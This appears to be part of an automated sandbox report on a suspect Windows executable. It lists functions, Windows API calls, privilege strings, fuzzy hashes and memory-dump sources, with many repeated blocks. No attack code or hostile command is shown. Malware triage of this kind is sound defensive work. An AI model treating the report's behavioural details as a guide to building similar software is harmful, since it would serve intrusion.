Opcode Fuzzy Hash: 5ce6a2427cdb8d8d8cc6fd7f1f6deaccd22d3e14497a3656c927512f9a7dc2f7
Instruction Fuzzy Hash: E6A001962B9113BC350DB29AAD46C3B22ACD5D5BA5330CAEEF91AC5092A88828855075

Function 00B608DD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B608A7

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5a55124a73523c2e2d6342d76fea27e97cbab98d87e4bf96d9983f66384fc710
Instruction ID: ce7b76fcb3ee7b4adcf386208599b70198b8a75bb59050459f05b47b5bbc1b46
Opcode Fuzzy Hash: 5a55124a73523c2e2d6342d76fea27e97cbab98d87e4bf96d9983f66384fc710
Instruction Fuzzy Hash: E6A001962B9113BC350DB29AAD46C3B22ACD5D5BA5330CAEEF91AC5092A88828855075

Function 00B60A32 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B609FC

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 358cf83602c88d2e9e8c41eead9d223b3644e26c976c38576748a77f4a92d499
Instruction ID: 25b49106db0d8ebc8c2eac8fa005eb57120ed52ca22d84ea12295d903dcd5aed
Opcode Fuzzy Hash: 358cf83602c88d2e9e8c41eead9d223b3644e26c976c38576748a77f4a92d499
Instruction Fuzzy Hash: 25A011C23B8003BC3808328AAE02C3B028CC0C0B20330CAFAF80AC0082A88828000030

Function 00B60A3C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B609FC

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3834bc0f30aac7166e770eb74c08b2f5bcb35e80e87e0d21d5b0dc12dccb8774
Instruction ID: 25b49106db0d8ebc8c2eac8fa005eb57120ed52ca22d84ea12295d903dcd5aed
Opcode Fuzzy Hash: 3834bc0f30aac7166e770eb74c08b2f5bcb35e80e87e0d21d5b0dc12dccb8774
Instruction Fuzzy Hash: 25A011C23B8003BC3808328AAE02C3B028CC0C0B20330CAFAF80AC0082A88828000030

Function 00B60A1E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B609FC

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3244e3aa6822354030e4e3b6dbbb5408cf7393d534dc7fe78cb903daf1d64311
Instruction ID: 25b49106db0d8ebc8c2eac8fa005eb57120ed52ca22d84ea12295d903dcd5aed
Opcode Fuzzy Hash: 3244e3aa6822354030e4e3b6dbbb5408cf7393d534dc7fe78cb903daf1d64311
Instruction Fuzzy Hash: 25A011C23B8003BC3808328AAE02C3B028CC0C0B20330CAFAF80AC0082A88828000030

Function 00B60A7F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B60A5D

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3170c457428640cab2cfa4dff60f93873255df6a0ee79995c3b9cc4f3738955c
Instruction ID: 0dc70bbb2026919b6786dff14646349037b22f384ed633c00e82b6ff5d32d71f
Opcode Fuzzy Hash: 3170c457428640cab2cfa4dff60f93873255df6a0ee79995c3b9cc4f3738955c
Instruction Fuzzy Hash: 5FA002D52B9103FC350971D69D56C3701DCD4C5B55730D9E9F455C4151544518455435

Function 00B60A6B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B60A5D

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 57e88a561ab57058656876916582db45484003a8826558cf87d177e3dcab0a7c
Instruction ID: 0dc70bbb2026919b6786dff14646349037b22f384ed633c00e82b6ff5d32d71f
Opcode Fuzzy Hash: 57e88a561ab57058656876916582db45484003a8826558cf87d177e3dcab0a7c
Instruction Fuzzy Hash: 5FA002D52B9103FC350971D69D56C3701DCD4C5B55730D9E9F455C4151544518455435

Function 00B60A50 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B60A5D

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4a9f29f606a1296cdb0f9a88098b60dc3202b27f1715529662e424b140188dda
Instruction ID: 96dd3b89274517e4f398c99c74cfb8c2d3432249a3af149b447ae96da535624b
Opcode Fuzzy Hash: 4a9f29f606a1296cdb0f9a88098b60dc3202b27f1715529662e424b140188dda
Instruction Fuzzy Hash: 69A012C12B4102BC310971D29C16C3702CCD4C0B10330C5E9F404C0040644418010030

Function 00B60A46 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B609FC

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 36f107c5f6a75c3153278664e5cb842579b3f7462bcbf83e27d8535d921de7ce
Instruction ID: 25b49106db0d8ebc8c2eac8fa005eb57120ed52ca22d84ea12295d903dcd5aed
Opcode Fuzzy Hash: 36f107c5f6a75c3153278664e5cb842579b3f7462bcbf83e27d8535d921de7ce
Instruction Fuzzy Hash: 25A011C23B8003BC3808328AAE02C3B028CC0C0B20330CAFAF80AC0082A88828000030

Function 00B4B949 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00B4A712,?,?,?,?,?,?,?), ref: 00B4B94C

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 3474b2e5463a5a2b90bafdc21355a6cfa359e80c92c34f1fbdc4659cef167433
Instruction ID: 3c9ff3e984e91b258d5185cb14c02c1542184549b0a218632a23c1d7425e5841
Opcode Fuzzy Hash: 3474b2e5463a5a2b90bafdc21355a6cfa359e80c92c34f1fbdc4659cef167433
Instruction Fuzzy Hash: 88A0113008080A8A8E002B30CA0880C3B20FB20BC030002A8A00BCB0A2CB22888B8A00

Function 00B5CBB6 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 00B5CBBA

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 086a1e17ae54834a299f6aaa93ae5d54c7a0136469012b16014e88e26ef90eed
Instruction ID: fed3b17645007d3fb1742ee70e7ddd916b5232782f32beb0ba24e32e784319be
Opcode Fuzzy Hash: 086a1e17ae54834a299f6aaa93ae5d54c7a0136469012b16014e88e26ef90eed
Instruction Fuzzy Hash: 13A011302002008B82000B328F0AA0EBBAAAFA2A00F00C028A00A80030CB3288A0EA00

Non-executed Functions

Function 00B5E560 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 240windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B41366: GetDlgItem.USER32(00000000,00003021), ref: 00B413AA
Part of subcall function 00B41366: SetWindowTextW.USER32(00000000,00B765F4), ref: 00B413C0

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B5E602
EndDialog.USER32(?,00000006), ref: 00B5E615
GetDlgItem.USER32(?,0000006C), ref: 00B5E631
SetFocus.USER32(00000000), ref: 00B5E638
SetDlgItemTextW.USER32(?,00000065,?), ref: 00B5E66C
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B5E69F
FindFirstFileW.KERNEL32(?,?), ref: 00B5E6B5

Part of subcall function 00B5CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 00B5CBEE
Part of subcall function 00B5CBC8: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B5CC05
Part of subcall function 00B5CBC8: SystemTimeToFileTime.KERNEL32(?,?), ref: 00B5CC19
Part of subcall function 00B5CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 00B5CC2A
Part of subcall function 00B5CBC8: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B5CC42
Part of subcall function 00B5CBC8: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 00B5CC66
Part of subcall function 00B5CBC8: _swprintf.LIBCMT ref: 00B5CC85

_swprintf.LIBCMT ref: 00B5E704

Part of subcall function 00B44C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B44C13

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B5E717
FindClose.KERNEL32(00000000), ref: 00B5E71E
_swprintf.LIBCMT ref: 00B5E773
SetDlgItemTextW.USER32(?,00000068,?), ref: 00B5E786
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B5E7A0
_swprintf.LIBCMT ref: 00B5E7D9
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B5E7EC
_swprintf.LIBCMT ref: 00B5E83C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00B5E84F

Part of subcall function 00B5D0AB: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B5D0E1
Part of subcall function 00B5D0AB: GetNumberFormatW.KERNEL32(00000400,00000000,?,00B8272C,?,?), ref: 00B5D12A

Strings

%s %s, xrefs: 00B5E6F1, 00B5E6FD, 00B5E769, 00B5E7CF, 00B5E832
REPLACEFILEDLG, xrefs: 00B5E59C

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
String ID: %s %s$REPLACEFILEDLG
API String ID: 3464475507-439456425
Opcode ID: e090060f972776b602925b0efa854bb442c8bdaca35677a7c246c690f8a9cf46
Instruction ID: 9a2f171afa94cdaca6e039d41cac7b787c30d03d976ba34d8ca39c21351f4e86
Opcode Fuzzy Hash: e090060f972776b602925b0efa854bb442c8bdaca35677a7c246c690f8a9cf46
Instruction Fuzzy Hash: 5971DB72648344BFE3359B64DC8AFFF77DCEB85701F040899FA59D6081EA719A088762

Function 00B47FD3 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 365fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B4807F
_wcslen.LIBCMT ref: 00B48112

Part of subcall function 00B48C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B48CB2
Part of subcall function 00B48C95: GetLastError.KERNEL32 ref: 00B48CF6
Part of subcall function 00B48C95: CloseHandle.KERNEL32(?), ref: 00B48D05

Part of subcall function 00B4BC65: DeleteFileW.KERNELBASE(?,?,?,?,00B4B14B,?,00000000,00B4AF6E,CEEE5757,00000000,00B7517A,000000FF,?,00B48882,?,?), ref: 00B4BC82
Part of subcall function 00B4BC65: DeleteFileW.KERNEL32(?,?,?,00000800,?,00B4B14B,?,00000000,00B4AF6E,CEEE5757,00000000,00B7517A,000000FF,?,00B48882,?), ref: 00B4BCAE

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00B481C1
CloseHandle.KERNEL32(00000000), ref: 00B481DD
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,?,?,?,CEEE5757,00000000), ref: 00B48329

Part of subcall function 00B4B7E2: FlushFileBuffers.KERNEL32(?), ref: 00B4B7FC
Part of subcall function 00B4B7E2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00B4B8B0

Part of subcall function 00B4AFD0: FindCloseChangeNotification.KERNELBASE(?,?,?,00B4AF75,CEEE5757,00000000,00B7517A,000000FF,?,00B48882,?,?), ref: 00B4AFEB

Part of subcall function 00B4C2E5: SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,00B4BF5E,?,?), ref: 00B4C305
Part of subcall function 00B4C2E5: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B4BF5E,?,?), ref: 00B4C334

Strings

SeRestorePrivilege, xrefs: 00B48034
\??\, xrefs: 00B480A1
SeCreateSymbolicLinkPrivilege, xrefs: 00B4803E
UNC\, xrefs: 00B480D2

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushLastNotificationProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 243576179-3508440684
Opcode ID: 7c98bbd451fb456530a6b0f28b8e8b92b90097987f7cecdba1d432696293f5b1
Instruction ID: 181bc5448c93f6a2f963cb1615d72da2426c35a215ffc4bfbf0590d80c927d21
Opcode Fuzzy Hash: 7c98bbd451fb456530a6b0f28b8e8b92b90097987f7cecdba1d432696293f5b1
Instruction Fuzzy Hash: 20D180B1900249ABDB25DF64CC81BEEB7E9FF04700F00459AFA59E7241DB74AB44DBA1

Function 00B60B80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00B60AC5,0000001C,00B60CBA,00000000,?,?,?,?,?,?,?,00B60AC5,00000004,00BA5D24,00B60D4A), ref: 00B60B91
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00B60AC5,00000004,00BA5D24,00B60D4A), ref: 00B60BAC

Strings

D, xrefs: 00B60BA0

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: c9a56f0e23cd560d24c9a7a5e0d06ed6c77c6262fdaa49609d968327b6bd55b0
Instruction ID: bcb7fbae1a0c7338646ca476f62785c27eabf4ac045c94599aa43e6afba7079a
Opcode Fuzzy Hash: c9a56f0e23cd560d24c9a7a5e0d06ed6c77c6262fdaa49609d968327b6bd55b0
Instruction Fuzzy Hash: BE01F7326101096BCB14EF2ADC05FDE7BE9EFC4328F0CC124AD59E7244DA38E805CA80

Function 00B5D0AB Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B5D0E1
GetNumberFormatW.KERNEL32(00000400,00000000,?,00B8272C,?,?), ref: 00B5D12A

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
